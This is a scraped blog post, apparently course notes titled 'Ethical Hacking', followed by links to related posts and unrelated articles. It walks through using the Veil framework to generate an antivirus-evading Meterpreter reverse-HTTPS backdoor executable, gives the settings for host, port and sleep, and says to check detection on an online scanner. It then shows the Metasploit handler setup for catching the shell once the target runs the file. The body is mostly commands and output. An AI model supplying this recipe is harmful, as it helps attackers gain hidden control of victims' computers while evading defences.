CLIENT SIDE ATTACKS - Backdooring exe' s

Download an executable file first.

VEIL - FRAMEWORK

A backdoor is a file that gives us full control over the machine that it gets executed on.

Backdoors can be caught by Anti-Virus programs.

Veil is a framework for generating Undetectable backdoors.

1. Run veil

veil

Select tool 1 - Evasion.

2. List payloads and Select one

Veil/Evasion>: list

===============================================================================

                                   Veil-Evasion

===============================================================================

      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

===============================================================================

 [*] Available Payloads:

    1)    autoit/shellcode_inject/flat.py

    2)    auxiliary/coldwar_wrapper.py

    3)    auxiliary/macro_converter.py

    4)    auxiliary/pyinstaller_wrapper.py

    5)    c/meterpreter/rev_http.py

    6)    c/meterpreter/rev_http_service.py

    7)    c/meterpreter/rev_tcp.py

    8)    c/meterpreter/rev_tcp_service.py

    9)    cs/meterpreter/rev_http.py

    10)    cs/meterpreter/rev_https.py

    11)    cs/meterpreter/rev_tcp.py

    12)    cs/shellcode_inject/base64.py

    13)    cs/shellcode_inject/virtual.py

    14)    go/meterpreter/rev_http.py

    15)    go/meterpreter/rev_https.py

    16)    go/meterpreter/rev_tcp.py

    17)    go/shellcode_inject/virtual.py

    18)    lua/shellcode_inject/flat.py

    19)    perl/shellcode_inject/flat.py

    20)    powershell/meterpreter/rev_http.py

    21)    powershell/meterpreter/rev_https.py

    22)    powershell/meterpreter/rev_tcp.py

    23)    powershell/shellcode_inject/psexec_virtual.py

    24)    powershell/shellcode_inject/virtual.py

    25)    python/meterpreter/bind_tcp.py

    26)    python/meterpreter/rev_http.py

    27)    python/meterpreter/rev_https.py

    28)    python/meterpreter/rev_tcp.py

    29)    python/shellcode_inject/aes_encrypt.py

    30)    python/shellcode_inject/arc_encrypt.py

    31)    python/shellcode_inject/base64_substitution.py

    32)    python/shellcode_inject/des_encrypt.py

    33)    python/shellcode_inject/flat.py

    34)    python/shellcode_inject/letter_substitution.py

    35)    python/shellcode_inject/pidinject.py

    36)    python/shellcode_inject/stallion.py

    37)    ruby/meterpreter/rev_http.py

    38)    ruby/meterpreter/rev_https.py

    39)    ruby/meterpreter/rev_tcp.py

    40)    ruby/shellcode_inject/base64.py

    41)    ruby/shellcode_inject/flat.py

3. Generating an undetectable backdoor using Veil 3

use go/meterpreter/rev_https.py

set LHOST 10.0.0.15
set LPORT 8080
set PROCESSORS 1
set SLEEP 6

4. Generate backdoor

generate

Scan the file through https://nodistribute.com/.

Run hander

1. Run Metasploit

msfconsole

2. Use the handler module.

use exploit/multi/handler

3. Set payload

set PAYLOAD [veil payload]

4. Set IP

set LHOST [your IP]

5. Set port

set LPORT [veil port]

6. exploit

exploit

Run the backdoor file on the target machine sucessfully.

Ethical Hacking - GAINING ACCESS(17)的更多相关文章

  1. Ethical Hacking - GAINING ACCESS(1)

    Gaining Access Introduction Everything is a computer Two main approaches (1)Server Side Do not requi ...

  2. Ethical Hacking - GAINING ACCESS(23)

    CLIENT SIDE ATTACK - BeEF Framework Hooking targets using MITMF Tools: MITMF and BeEF Start BeEF and ...

  3. Ethical Hacking - GAINING ACCESS(10)

    CLIENT SIDE ATTACKS Use if server-side attacks fail. If IP is probably useless. Require user interac ...

  4. Ethical Hacking - GAINING ACCESS(6)

    Server Side Attack Analysing scan results and exploiting target system. Go to the Analysis page and ...

  5. Ethical Hacking - GAINING ACCESS(24)

    CLIENT SIDE ATTACKS - Detecting Trojan manually or using a sandbox Analyzing trojans Check the prope ...

  6. Ethical Hacking - GAINING ACCESS(22)

    CLIENT SIDE ATTACKS - BeEf Framework Browser Exploitation Framework allowing us to launch a number o ...

  7. Ethical Hacking - GAINING ACCESS(21)

    CLIENT SIDE ATTACKS - Trojan delivery method - using email spoofing Use gathered info to contract ta ...

  8. Ethical Hacking - GAINING ACCESS(20)

    CLIENT SIDE ATTACKS - Spoofing backdoor extension Change the extension of the trojan from exe to a s ...

  9. Ethical Hacking - GAINING ACCESS(19)

    Client-Side Attacks - Social Engineering Tool: The FAT RAT Just like Veil, it generates Undetectable ...

随机推荐

  1. 02 . Ansible高级用法(运维开发篇)

    自动化任务简介 假设我们要在10台linux服务器上安装一个nginx服务,手动是如何做的? # 第一步, ssh登录NUM(1,n)服务器 # 第二步,输入对应服务器密码 # 第三步,执行命令: y ...

  2. HTML新增的语义化标签及其作用

    在html5中,新增了几个语义化标签:<article>.<section>.<aside>.<hgroup>. <header>,< ...

  3. Hystrix总结

    Hystrix 能使你的系统在出现依赖服务失效的时候,通过隔离系统所依赖的服务,防止服务级联失败,同时提供失败回退机制,更优雅地应对失效,并使你的系统能更快地从异常中恢复. Hystrix能做什么? ...

  4. 5、struct2的支持ModelDriver获得参数

    1.在以前的代码中我们我们需要获得jsp传递过来的参数我们采用下面的方式获得 package com.weiyuan.test; /** * struct2的action可以不继承任何框架的接口 * ...

  5. ES6 promise用法总结

    一   什么时候promise? promise是异步编程的一个解决方案,是一个构造函数,身上带着all,resolve,reject,原型上有cath,then等方法 promise有两个特点: 1 ...

  6. Windows10系统下安装配置Tomcat 9.0.1

    Tomcat9.0.1下载:https://tomcat.apache.org/download-90.cgi 配置jdk的环境变量(略) 在系统变量里新建变量名:CATALINA_BASE,变量值: ...

  7. SerializableClob转String

    ORACLE数据库读取CLOB字段,JAVA中获取到类型为SerializableClob,如何转换成String类型那? 以下是代码示例:         SerializableClob sc = ...

  8. SQL Server 索引的含义和特点

    索引用于快速找出在某个列中某一特定值的行.不使索引,数据库必须从第一条记录开始读完整个表,直到找到相关行.如果表中查询的列有一个索引,数据库能快速到达一个位置去搜寻数据,而不必查看所有数据. 索引的含 ...

  9. Spring 容器的初始化

    读完这篇文章你将会收获到 了解到 Spring 容器初始化流程 ThreadLocal 在 Spring 中的最佳实践 面试中回答 Spring 容器初始化流程 引言 我们先从一个简单常见的代码入手分 ...

  10. 记一次解密wireshark抓取的冰蝎通信流量

    一.关于冰蝎 1.1 简单介绍 冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端.老牌 Webshell 管理神器——中国菜刀的攻击流量特征明显,容易被各类安全设备检测,实际场 ...